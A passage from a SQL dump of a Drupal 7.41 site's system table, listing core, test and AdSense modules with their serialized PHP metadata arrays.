hook_requirements(\'install).\";s:12:\"dependencies\";a:2:{i:0;s:18:\"requirements1_test\";i:1;s:7:\"comment\";}s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/session_test.module','session_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"Session test\";s:11:\"description\";s:40:\"Support module for session data testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_dependencies_test.module','system_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"System dependency test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:19:\"_missing_dependency\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_core_version_dependencies_test.module','system_incompatible_core_version_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:50:\"System incompatible core version dependencies test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:37:\"system_incompatible_core_version_test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_core_version_test.module','system_incompatible_core_version_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:37:\"System incompatible core version test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"5.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_module_version_dependencies_test.module','system_incompatible_module_version_dependencies_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:52:\"System incompatible module version dependencies test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:46:\"system_incompatible_module_version_test (>2.0)\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_incompatible_module_version_test.module','system_incompatible_module_version_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:39:\"System incompatible module version test\";s:11:\"description\";s:47:\"Support module for testing system dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_project_namespace_test.module','system_project_namespace_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:29:\"System project namespace test\";s:11:\"description\";s:58:\"Support module for testing project namespace dependencies.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:13:\"drupal:filter\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/system_test.module','system_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"System test\";s:11:\"description\";s:34:\"Support module for system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:18:\"system_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/taxonomy_test.module','taxonomy_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:20:\"Taxonomy test module\";s:11:\"description\";s:45:\"\"Tests functions and hooks not used in core\".\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:12:\"dependencies\";a:1:{i:0;s:8:\"taxonomy\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/theme_test.module','theme_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Theme test\";s:11:\"description\";s:40:\"Support module for theme system testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_script_test.module','update_script_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:18:\"Update script test\";s:11:\"description\";s:41:\"Support module for update script testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_1.module','update_test_1','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_2.module','update_test_2','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/update_test_3.module','update_test_3','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:34:\"Support module for update testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/url_alter_test.module','url_alter_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Url_alter tests\";s:11:\"description\";s:45:\"A support modules for url_alter hook testing.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/simpletest/tests/xmlrpc_test.module','xmlrpc_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"XML-RPC Test\";s:11:\"description\";s:75:\"Support module for XML-RPC tests according to the validator1 specification.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/statistics/statistics.module','statistics','module','',1,1,7000,0,'a:13:{s:4:\"name\";s:10:\"Statistics\";s:11:\"description\";s:37:\"Logs access statistics for your site.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"statistics.test\";}s:9:\"configure\";s:30:\"admin/config/system/statistics\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/syslog/syslog.module','syslog','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:6:\"Syslog\";s:11:\"description\";s:41:\"Logs and records system events to syslog.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"syslog.test\";}s:9:\"configure\";s:32:\"admin/config/development/logging\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/system/system.module','system','module','',1,0,7080,0,'a:14:{s:4:\"name\";s:6:\"System\";s:11:\"description\";s:54:\"Handles general site configuration for administrators.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:6:{i:0;s:19:\"system.archiver.inc\";i:1;s:15:\"system.mail.inc\";i:2;s:16:\"system.queue.inc\";i:3;s:14:\"system.tar.inc\";i:4;s:18:\"system.updater.inc\";i:5;s:11:\"system.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/system\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/system/tests/cron_queue_test.module','cron_queue_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"Cron Queue test\";s:11:\"description\";s:41:\"Support module for the cron queue runner.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/taxonomy/taxonomy.module','taxonomy','module','',1,0,7011,0,'a:15:{s:4:\"name\";s:8:\"Taxonomy\";s:11:\"description\";s:38:\"Enables the categorization of content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:7:\"options\";}s:5:\"files\";a:2:{i:0;s:15:\"taxonomy.module\";i:1;s:13:\"taxonomy.test\";}s:9:\"configure\";s:24:\"admin/structure/taxonomy\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/toolbar/toolbar.module','toolbar','module','',1,0,0,0,'a:12:{s:4:\"name\";s:7:\"Toolbar\";s:11:\"description\";s:99:\"Provides a toolbar that shows the top-level administration menu items and links from other modules.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/tracker/tracker.module','tracker','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:7:\"Tracker\";s:11:\"description\";s:45:\"Enables tracking of recent content for users.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"comment\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"tracker.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/translation/tests/translation_test.module','translation_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Content Translation Test\";s:11:\"description\";s:49:\"Support module for the content translation tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/translation/translation.module','translation','module','',0,0,-1,0,'a:12:{s:4:\"name\";s:19:\"Content translation\";s:11:\"description\";s:57:\"Allows content to be translated into different languages.\";s:12:\"dependencies\";a:1:{i:0;s:6:\"locale\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:16:\"translation.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/trigger/tests/trigger_test.module','trigger_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"Trigger Test\";s:11:\"description\";s:33:\"Support module for Trigger tests.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/trigger/trigger.module','trigger','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:7:\"Trigger\";s:11:\"description\";s:90:\"Enables actions to be fired on certain system events, such as when new content is created.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"trigger.test\";}s:9:\"configure\";s:23:\"admin/structure/trigger\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/update/tests/aaa_update_test.module','aaa_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"AAA Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/bbb_update_test.module','bbb_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"BBB Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/ccc_update_test.module','ccc_update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:15:\"CCC Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"version\";s:4:\"7.41\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/tests/update_test.module','update_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Update test\";s:11:\"description\";s:41:\"Support module for update module testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/update/update.module','update','module','',1,0,7001,0,'a:13:{s:4:\"name\";s:14:\"Update manager\";s:11:\"description\";s:104:\"Checks for available updates, and can securely install or update modules and themes via a web interface.\";s:7:\"version\";s:4:\"7.41\";s:7:\"package\";s:4:\"Core\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"update.test\";}s:9:\"configure\";s:30:\"admin/reports/updates/settings\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/user/tests/user_form_test.module','user_form_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:22:\"User module form tests\";s:11:\"description\";s:37:\"Support module for user form testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/user/user.module','user','module','',1,0,7018,0,'a:15:{s:4:\"name\";s:4:\"User\";s:11:\"description\";s:47:\"Manages the user registration and login system.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"user.module\";i:1;s:9:\"user.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:19:\"admin/config/people\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"user.css\";s:21:\"modules/user/user.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('profiles/standard/standard.profile','standard','module','',1,0,0,1000,'a:15:{s:4:\"name\";s:8:\"Standard\";s:11:\"description\";s:51:\"Install with commonly used features pre-configured.\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:21:{i:0;s:5:\"block\";i:1;s:5:\"color\";i:2;s:7:\"comment\";i:3;s:10:\"contextual\";i:4;s:9:\"dashboard\";i:5;s:4:\"help\";i:6;s:5:\"image\";i:7;s:4:\"list\";i:8;s:4:\"menu\";i:9;s:6:\"number\";i:10;s:7:\"options\";i:11;s:4:\"path\";i:12;s:8:\"taxonomy\";i:13;s:5:\"dblog\";i:14;s:6:\"search\";i:15;s:8:\"shortcut\";i:16;s:7:\"toolbar\";i:17;s:7:\"overlay\";i:18;s:8:\"field_ui\";i:19;s:4:\"file\";i:20;s:3:\"rdf\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:7:\"package\";s:5:\"Other\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;s:6:\"hidden\";b:1;s:8:\"required\";b:1;s:17:\"distribution_name\";s:6:\"Drupal\";}'),('sites/all/modules/adsense/adsense.module','adsense','module','',1,0,0,0,'a:13:{s:4:\"name\";s:12:\"AdSense core\";s:11:\"description\";s:116:\"Displays Google AdSense ads on your site to earn revenue. Requires at least one additional ad unit generator module.\";s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:29:\"admin/config/services/adsense\";s:5:\"files\";a:3:{i:0;s:14:\"adsense.module\";i:1;s:15:\"adsense.install\";i:2;s:17:\"adsense.admin.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/contrib/adsense_click/adsense_click.module','adsense_click','module','',1,0,0,0,'a:13:{s:4:\"name\";s:22:\"AdSense Click Tracking\";s:11:\"description\";s:31:\"Tracks clicks to Google Adsense\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:35:\"admin/config/services/adsense/click\";s:5:\"files\";a:4:{i:0;s:20:\"adsense_click.module\";i:1;s:21:\"adsense_click.install\";i:2;s:23:\"adsense_click.admin.inc\";i:3;s:22:\"adsense_click.logs.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/cse/adsense_cse.module','adsense_cse','module','',1,0,0,0,'a:13:{s:4:\"name\";s:10:\"CSE Search\";s:11:\"description\";s:122:\"AdSense for Search generator module. This module uses the new Custom Search Engine code created via the Adsense interface.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:33:\"admin/config/services/adsense/cse\";s:5:\"files\";a:4:{i:0;s:18:\"adsense_cse.module\";i:1;s:19:\"adsense_cse.install\";i:2;s:21:\"adsense_cse.admin.inc\";i:3;s:23:\"adsense_cse.results.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/managed/adsense_managed.module','adsense_managed','module','',1,0,0,0,'a:13:{s:4:\"name\";s:11:\"Managed ads\";s:11:\"description\";s:96:\"Ad unit generator module using the new managed ads feature available in the Google AdSense site.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:37:\"admin/config/services/adsense/managed\";s:5:\"files\";a:3:{i:0;s:22:\"adsense_managed.module\";i:1;s:23:\"adsense_managed.install\";i:2;s:25:\"adsense_managed.admin.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/old/oldcode/adsense_oldcode.module','adsense_oldcode','module','',1,0,0,0,'a:13:{s:4:\"name\";s:9:\"Ads (old)\";s:11:\"description\";s:109:\"Ad unit generator module using the old format code in which the colours are specified in the ad\'s JavaScript.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:37:\"admin/config/services/adsense/oldcode\";s:5:\"files\";a:3:{i:0;s:25:\"adsense_oldcode.admin.inc\";i:1;s:23:\"adsense_oldcode.install\";i:2;s:22:\"adsense_oldcode.module\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/old/revenue_sharing_basic/revenue_sharing_basic.module','revenue_sharing_basic','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:27:\"Revenue sharing basic (old)\";s:11:\"description\";s:45:\"Revenue sharing for the Google Adsense module\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:61:\"admin/config/services/adsense/publisher/revenue_sharing_basic\";s:5:\"files\";a:3:{i:0;s:31:\"revenue_sharing_basic.admin.inc\";i:1;s:29:\"revenue_sharing_basic.install\";i:2;s:28:\"revenue_sharing_basic.module\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('sites/all/modules/adsense/old/search/adsense_search.module','adsense_search','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:12:\"Search (old)\";s:11:\"description\";s:154:\"AdSense for Search generator module. This module uses the \'old\' code in which the user can select to search the entire Web or 1 to 3 user-defined 